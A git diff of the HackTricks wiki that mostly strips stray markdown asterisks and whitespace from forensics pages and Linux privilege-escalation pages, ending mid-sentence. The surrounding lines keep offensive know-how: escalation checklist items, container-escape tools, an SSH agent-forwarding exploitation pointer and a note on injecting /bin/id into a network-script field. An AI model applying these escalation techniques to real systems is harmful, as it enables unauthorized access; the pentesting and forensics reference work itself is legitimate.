a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index b6d52454..ececc18d 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -85,7 +85,7 @@ Searches for AES keys by searching for their key schedules. Able to find 128. 19 Download [here](https://sourceforge.net/projects/findaes/). -## Complementary tools +## Complementary tools You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.\ You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 84fcdb46..2a55a22e 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md @@ -122,7 +122,7 @@ Some interesting attributes: * Access date * MFT update date * DOS File permissions -* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others): +* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others): * File name * Creation date * Modification date diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 25b44f00..e24fb15e 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -6,9 +6,9 @@ A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file for ## Online tools for pcaps -* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)\*\*\*\* -* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)\*\*\*\* -* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)\*\*\*\* +* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) +* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) ## Extract Information @@ -28,7 +28,7 @@ You can find some Wireshark trick in: ### Xplico Framework -\*\*\*\*[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. +[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. #### Install @@ -118,7 +118,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ### YaraPcap -\*\*\*\*[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that * Reads a PCAP File and Extracts Http Streams. * gzip deflates any compressed streams diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index acffa2f3..c73fb051 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -61,11 +61,11 @@ Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ Other interesting filters: -* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic -* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic + TCP SYN -* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` * HTTP and initial HTTPS traffic + TCP SYN + DNS requests ### Search diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index 212ba08b..0d4d57ec 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -82,7 +82,7 @@ Check the previous error documentation. ## Automatic Tool -The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller). +The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **helps researcher to unpack and decompile executable** written in python (py2exe and pyinstaller). Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller). diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1a959535..6bb03ae2 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -31,7 +31,7 @@ Each profile has a "**Path**" variable with the name of the folder where it's da Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) path you should be able to find the following interesting files: * _**places.sqlite**_ : History (moz_\__places), bookmarks (moz\_bookmarks), and downloads (moz_\__annos). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_. - * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` + * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` * Note that the link type is a number that indicates: * 1: User followed a link * 2: User wrote the URL @@ -51,7 +51,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) pa * _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file. * _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**. - Information that can be obtained: + Information that can be obtained: * URL, fetch Count, Filename, Content type, FIle size, Last modified time, Last fetched time, Server Last Modified, Server Response * _**favicons.sqlite**_ : Favicons @@ -96,7 +96,7 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa * Reloaded * _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies. * _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca -* _**Bookmarks**_ : Bookmarks +* _**Bookmarks**_ : Bookmarks * _**Web Data**_ : Form History * _**Favicons**_ : Favicons * _**Login Data**_ : Login information (usernames, passwords...) @@ -147,7 +147,7 @@ The metadata information about the cache stores: #### Files -The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ +The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS). @@ -169,7 +169,7 @@ The metadata information about the cookies stores: #### Files -The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ +The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ Session cookies will reside in memory and persistent cookie in the disk. diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 91b41887..8ed11ce6 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,7 +2,7 @@ ## Introduction -Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts). +Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts). Broadly speaking, there are two generations of Office file format: the **OLE formats** (file extensions like RTF, DOC, XLS, PPT), and the "**Office Open XML**" formats (file extensions that include DOCX, XLSX, PPTX). **Both** formats are structured, compound file binary formats that **enable Linked or Embedded content** (Objects). OOXML files are actually zip file containers, meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document: diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index b243e65c..dca94dd9 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -81,7 +81,7 @@ To inspect these files you can use [**LinkParser**](http://4discovery.com/our-to In this tools you will find 2 set of timestamps: **FileModifiedDate**, **FileAccessDate** and **FileCreationDate**, and **LinkModifiedDate**, **LinkAccessDate** and **LinkCreationDate**. The first set of timestamp references the **timestamps of the link file itself**. The second set references the **timestamps of the linked file**. -You can get the same information running the Windows cli tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)\*\*\*\* +You can get the same information running the Windows cli tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs @@ -353,7 +353,7 @@ The cache stores various file metadata depending on the operating system, such a This information can be found in the registry in: -* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` +* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` * XP (96 entries) * `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` * Server 2003 (512 entries) @@ -478,7 +478,7 @@ This event is recorded by the EventID 4616 inside the Security Event log. The following System EventIDs are useful: * 20001 / 20003 / 10000: First time it was used -* 10100: Driver update +* 10100: Driver update The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted. diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index b4703689..38070ed2 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -32,7 +32,7 @@ ### Shared Folders -* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` +* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` * CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache * CSCFlag=16 -> Automatic caching documents. “All files and programs that users open from the shared folder are automatically available offline” with the “optimize for performance" unticked. * CSCFlag=32 -> Like the previous options by “optimize for performance” is ticked @@ -42,10 +42,10 @@ ### AutoStart programs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` -* `Software\Microsoft\Windows\CurrentVersion\Runonce` -* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `Software\Microsoft\Windows\CurrentVersion\Runonce` +* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` * `Software\Microsoft\Windows\CurrentVersion\Run` ### Explorer Searches @@ -110,7 +110,7 @@ Desktop Access: * `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` * `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` -To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*. +To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time**. Note 2 things from the following image: diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index 0d444e1f..e5e574d4 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md @@ -9,11 +9,11 @@ description: Checklist for privilege escalation in Linux Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -104,7 +104,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass -* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)\*\*\*\* +* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload) * [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder? * [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md index c44b2e14..0f18ea6a 100644 --- a/linux-unix/privilege-escalation/README.md +++ b/linux-unix/privilege-escalation/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -341,7 +341,7 @@ Press Ctrl-C to end monitoring without terminating the process. To dump a process memory you could use: -* [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)\*\*\*\* +* [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) * [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - _You can manually remove root requirements and dump process owned by you_ * Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required) @@ -654,7 +654,7 @@ If you find that you can use the **`runc`** command read the following page as * D-BUS is an **inter-process communication (IPC) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. -D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. _\*\*_(From [here](https://www.linuxjournal.com/article/7744)). +D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. _**_(From [here](https://www.linuxjournal.com/article/7744)). D-Bus uses an **allow/deny model**, where each message (method call, signal emission, etc.) can be **allowed or denied** according to the sum of all policy rules which match it. Each or rule in the policy should have the `own`, `send_destination` or `receive_sender` attribute set. @@ -1241,7 +1241,7 @@ Specifies files that contains the public keys that can be used for user authenti AuthorizedKeysFile .ssh/authorized_keys access ``` -That configuration will indicate that if you try to login with the **private** key \*\*\*\*of the user "\*\*testusername\*\*" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` +That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` #### ForwardAgent/AllowAgentForwarding @@ -1259,7 +1259,7 @@ Notice that if `Host` is `*` every time the user jumps to a different machine th The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). -If you Forward Agent configured in an environment \*\*\*\*\[\*\*check here how to exploit it to escalate privileges\*\*]\(ssh-forward-agent-exploitation.md). +If you Forward Agent configured in an environment \[**check here how to exploit it to escalate privileges**]\(ssh-forward-agent-exploitation.md). ## Interesting Files @@ -1490,7 +1490,7 @@ DEVICE=eth0 (_Note the black space between Network and /bin/id_) -**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f)\*\*\*\* +**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) ### **init, init.d, systemd, and rc.d** diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index 47134389..bc159135 100644 --- a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -336,7 +336,7 @@ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oou _Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._ -### C code +### C code {% code title="d-bus_server.c" %} ```c diff --git a/linux-unix/privilege-escalation/docker-breakout/README.md b/linux-unix/privilege-escalation/docker-breakout/README.md index c23c3bbb..c6f9d1cb 100644 --- a/linux-unix/privilege-escalation/docker-breakout/README.md +++ b/linux-unix/privilege-escalation/docker-breakout/README.md @@ -102,7 +102,7 @@ When I changed Docker host, I had to move the root keys and repository keys to o ### Namespaces -**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. +**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. Docker makes use of the following Linux kernel Namespaces to achieve Container isolation: @@ -245,7 +245,7 @@ docker build --secret my_key=my_value ,src=path/to/my_secret_file . Where your file specifies your secrets as key-value pair. -These secrets are excluded from the image build cache. and from the final image. +These secrets are excluded from the image build cache. and from the final image. If you need your **secret in your running container**, and not just when building your image, use **Docker Compose or Kubernetes**. @@ -291,7 +291,7 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration * Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. * [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. * [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* ****[**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. +* [**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. * **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required. * **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP. * **Regularly** **rebuild** your images to **apply security patches to the host an images.** diff --git a/linux-unix/privilege-escalation/docker-breakout/apparmor.md b/linux-unix/privilege-escalation/docker-breakout/apparmor.md index 2014ee33..e67abb21 100644 --- a/linux-unix/privilege-escalation/docker-breakout/apparmor.md +++ b/linux-unix/privilege-escalation/docker-breakout/apparmor.md @@ -42,7 +42,7 @@ aa-mergeprof #used to merge the policies ## Creating a profile * In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -* To indicate the access the binary will have over **files** the following **access controls** can be used: +* To indicate the access the binary will have over **files** the following **access controls** can be used: * **r** (read) * **w** (write) * **m** (memory map as executable) diff --git a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md index 40cb3712..24aba954 100644 --- a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md @@ -36,7 +36,7 @@ In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/co ### Simple Plugin Tutorial -You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot)**** +You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) Read the `README` and the `plugin.go` code to understand how is it working. diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md index 5d5b2df6..6c3245b2 100644 --- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md +++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md @@ -2,11 +2,11 @@ ## Automatic Enumeration & Escape -* ****[**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** -* ****[**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** -* ****[**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it -* ****[**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers -* ****[**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image +* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** +* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** +* [**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it +* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers +* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image ## Mounted Docker Socket Escape diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md index f13de214..bc1dd0b8 100644 --- a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md +++ b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md @@ -154,7 +154,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster ### AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. +**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) diff --git a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md index 1295d76a..7af701b7 100644 --- a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -9,7 +9,7 @@ The abuse of this vulnerability remotely could be as easy as injecting via XSS t ``` -But obviously the exploitation will be **much easier locally**, as you can use a tool such as: 